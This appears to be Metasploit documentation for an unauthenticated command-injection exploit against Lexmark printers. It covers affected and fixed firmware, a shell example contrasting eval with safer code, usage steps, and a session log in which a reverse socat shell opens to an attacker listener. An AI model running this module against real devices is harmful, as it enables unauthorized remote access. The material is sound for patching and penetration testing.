
Lexmark Faxtrace Settings

documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md


Vulnerable Application

An unauthenticated remote code execution vulnerability exists in the embedded web server of certain Lexmark devices through 2023-02-19. It is exposed only if, during initial setup of the printer, the user chose "Set up Later" when prompted to create an Admin user. With no Admin user configured, the endpoint `/cgi-bin/fax_change_faxtrace_settings` is reachable without authentication; it lets the caller configure a number of fax settings.

Several of the configurable parameters on that page (for example `FT_Custom_lbtrace`) are not sanitized before being used in a bash `eval` statement (`eval "$cmd" > /dev/null`), so an unauthenticated user can run arbitrary commands as the web server user.
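To make the injection concrete, the script below is a small stand-in for the pattern described above, written for this page as an added example. It is not the firmware's CGI script: the `set_fax_trace` stand-in, the way `cmd` is assembled from the `FT_Custom_lbtrace` value, and the sample inputs are all assumptions. It contrasts the `eval "$cmd"` pattern with two safer alternatives: passing the value as a single quoted argument without `eval`, and additionally validating it against an allowlist before use.

```shell
#!/bin/sh
# Added example for this page, not Lexmark's CGI code. The set_fax_trace stand-in,
# the shape of cmd, and the inputs below are assumptions used for illustration.

# Stand-in for whatever the real script runs; it just echoes its arguments.
set_fax_trace() {
    printf 'trace level set to %s\n' "$*"
}

# 1. Vulnerable pattern: the request parameter is spliced into a string that is
#    handed to eval. Anything the shell treats as syntax (";", "|", "$(...)",
#    backticks) inside FT_Custom_lbtrace becomes a second command. stdout is
#    kept here (the real script discards it with > /dev/null) so the effect is
#    visible; discarding output does not stop the command from running.
vulnerable_set_trace() {
    lbtrace="$1"                            # untrusted: straight from the request
    cmd="set_fax_trace --lbtrace=$lbtrace"  # assumed shape of the command string
    eval "$cmd" 2>/dev/null
}

# 2. No eval: the value is passed as one quoted argv element. The shell never
#    re-parses it, so "x; echo INJECTED" reaches set_fax_trace as a literal
#    string instead of being executed. This alone closes the command injection.
noeval_set_trace() {
    lbtrace="$1"
    set_fax_trace --lbtrace="$lbtrace"
}

# 3. No eval plus allowlist: reject anything outside [A-Za-z0-9_-] before use.
#    Returns 1 and prints nothing on stdout for rejected input.
hardened_set_trace() {
    lbtrace="$1"
    case "$lbtrace" in
        ''|*[!A-Za-z0-9_-]*)
            printf 'rejected FT_Custom_lbtrace value\n' >&2
            return 1
            ;;
    esac
    set_fax_trace --lbtrace="$lbtrace"
}

# Demo when run with DEMO=1: only the first call executes the injected echo.
if [ "${DEMO:-0}" = 1 ]; then
    vulnerable_set_trace 'x; echo INJECTED'
    noeval_set_trace 'x; echo INJECTED'
    hardened_set_trace 'x; echo INJECTED' || echo "hardened: rejected"
    hardened_set_trace 'level3'
fi
```

Run it with `DEMO=1 sh example.sh` to see the three behaviours side by side. The allowlist is the important part for a setting like this: the legitimate values are short tokens, so anything containing shell metacharacters has no business reaching the command at all, regardless of how it is quoted.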

Installation Steps

Testing of this module was performed on a physical device. Emulating the firmware with QEMU or similar methods has not been explored.

Affected Models

| Lexmark Models | Affected Releases | Fixed Releases |
| --- | --- | --- |
| CX930, CX931, CX942, CX943, CX944 | CXTPC.081.232 and previous | CXTPC.081.233 and later |
| XC9325, XC9335, XC9445, XC9455, XC9465 | CXTPC.081.232 and previous | CXTPC.081.233 and later |
| CS943 | CSTPC.081.232 and previous | CSTPC.081.233 and later |
| MX432 | MXTCT.081.232 and previous | MXTCT.081.233 and later |
| XM3142 | MXTCT.081.232 and previous | MXTCT.081.233 and later |
| MX931 | MXTPM.081.232 and previous | MXTPM.081.233 and later |
| CX730, CX735 | CXTMM.081.232 and previous | CXTMM.081.233 and later |
| XC4342, XC4352 | CXTMM.081.232 and previous | CXTMM.081.233 and later |
| CS730, CS735 | CSTMM.081.232 and previous | CSTMM.081.233 and later |
| C4342, C4352 | CSTMM.081.232 and previous | CSTMM.081.233 and later |
| B2236 | MSLSG.081.232 and previous | MSLSG.081.233 and later |
| MB2236 | MXLSG.081.232 and previous | MXLSG.081.233 and later |
| MS331, MS431, MS439 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| M1342 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| B3442, B3340 | MSLBD.081.232 and previous | MSLBD.081.233 and later |
| XM1342 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MX331, MX431 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MB3442 | MXLBD.081.232 and previous | MXLBD.081.233 and later |
| MS321, MS421, MS521, MS621 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| M1242, M1246 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| B2338, B2442, B2546, B2650 | MSNGM.081.232 and previous | MSNGM.081.233 and later |
| MS622 | MSTGM.081.232 and previous | MSTGM.081.233 and later |
| M3250 | MSTGM.081.232 and previous | MSTGM.081.233 and later |
| MX321 | MXNGM.081.232 and previous | MXNGM.081.233 and later |
| MB2338 | MXNGM.081.232 and previous | MXNGM.081.233 and later |
| MX421, MX521, MX522, MX622 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| XM1242, XM1246, XM3250 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| MB2442, MB2546, MB2650 | MXTGM.081.232 and previous | MXTGM.081.233 and later |
| MS725, MS821, MS823, MS825 | MSNGW.081.232 and previous | MSNGW.081.233 and later |
| B2865 | MSNGW.081.232 and previous | MSNGW.081.233 and later |
| MS822, MS826 | MSTGW.081.232 and previous | MSTGW.081.233 and later |
| M5255, M5270 | MSTGW.081.232 and previous | MSTGW.081.233 and later |
| MX721, MX722, MX725, MX822, MX826 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| XM5365, XM5370, XM7355, XM7370 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| MB2770 | MXTGW.081.232 and previous | MXTGW.081.233 and later |
| C3426 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| CS431, CS439 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| CS331 | CSLBL.081.232 and previous | CSLBL.081.233 and later |
| C3224, C3326 | CSLBL.081.232 and previous | CSLBL.081.233 and later |
| C2326 | CSLBN.081.232 and previous | CSLBN.081.233 and later |
| MC3426 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| CX431 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| XC2326 | CXLBN.081.232 and previous | CXLBN.081.233 and later |
| MC3224, MC3326 | CXLBL.081.232 and previous | CXLBL.081.233 and later |
| CX331 | CXLBL.081.232 and previous | CXLBL.081.233 and later |
| CS622 | CSTZJ.081.232 and previous | CSTZJ.081.233 and later |
| C2240 | CSTZJ.081.232 and previous | CSTZJ.081.233 and later |
| CS421, CS521 | CSNZJ.081.232 and previous | CSNZJ.081.233 and later |
| C2325, C2425, C2535 | CSNZJ.081.232 and previous | CSNZJ.081.233 and later |
| CX522, CX622, CX625 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| XC2235, XC4240 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| MC2535, MC2640 | CXTZJ.081.232 and previous | CXTZJ.081.233 and later |
| CX421 | CXNZJ.081.232 and previous | CXNZJ.081.233 and later |
| MC2325, MC2425 | CXNZJ.081.232 and previous | CXNZJ.081.233 and later |
| CX820, CX825, CX827, CX860 | CXTPP.081.232 and previous | CXTPP.081.233 and later |
| XC6152, XC6153, XC8155, XC8160, XC8163 | CXTPP.081.232 and previous | CXTPP.081.233 and later |
| CS820, CS827 | CSTPP.081.232 and previous | CSTPP.081.233 and later |
| C6160 | CSTPP.081.232 and previous | CSTPP.081.233 and later |
| CS720, CS725, CS727, CS728 | CSTAT.081.232 and previous | CSTAT.081.233 and later |
| C4150 | CSTAT.081.232 and previous | CSTAT.081.233 and later |
| CX725, CX727 | CXTAT.081.232 and previous | CXTAT.081.233 and later |
| XC4140, XC4143, XC4150, XC4153 | CXTAT.081.232 and previous | CXTAT.081.233 and later |
| CS921, CS923, CS927 | CSTMH.081.232 and previous | CSTMH.081.233 and later |
| C9235 | CSTMH.081.232 and previous | CSTMH.081.233 and later |
| CX920, CX921, CX922, CX923, CX924 | CXTMH.081.232 and previous | CXTMH.081.233 and later |
| XC9225, XC9235, XC9245, XC9255, XC9265 | CXTMH.081.232 and previous | CXTMH.081.233 and later |

Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/linux/http/lexmark_faxtrace_settings`
  3. Do: `set RHOST [IP]`
  4. Do: `set LHOST [IP]`
  5. Do: `exploit`

Options

SLEEP

If the printer has been inactive for some time it may be asleep, in which case it is best to send a request or two to wake it up before running the check method or the exploit. This option sets how long to wait for the printer to wake up after those requests are sent.

Scenarios

Lexmark Printer MC3224 CXLBL.073.023

```
msf > use linux/http/lexmark_faxtrace_settings
[*] Using configured payload cmd/unix/reverse_socat_tcp
msf exploit(linux/http/lexmark_faxtrace_settings) > set rhosts 192.168.1.71
rhosts => 192.168.1.71
msf exploit(linux/http/lexmark_faxtrace_settings) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf exploit(linux/http/lexmark_faxtrace_settings) > options

Module options (exploit/linux/http/lexmark_faxtrace_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.71     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SLEEP    10               yes       Sleep time to wait for the print to wake
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_socat_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.72     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


View the full module info with the info, or info -d command.

msf exploit(linux/http/lexmark_faxtrace_settings) > run

[*] Started reverse TCP handler on 192.168.1.72:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Waking up the printer ...
[+] The target appears to be vulnerable. The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable
[*] Executing Unix (In-Memory) for cmd/unix/reverse_socat_tcp
[*] Command shell session 5 opened (192.168.1.72:4444 -> 192.168.1.71:54456) at 2023-08-30 19:51:57 -0400


Shell Banner:
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$
-----


httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ id
id
uid=985(httpd) gid=982(httpd) groups=982(httpd)
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ uname -a
uname -a
Linux ET788C773C36F9 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020 armv7l GNU/Linux
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$
```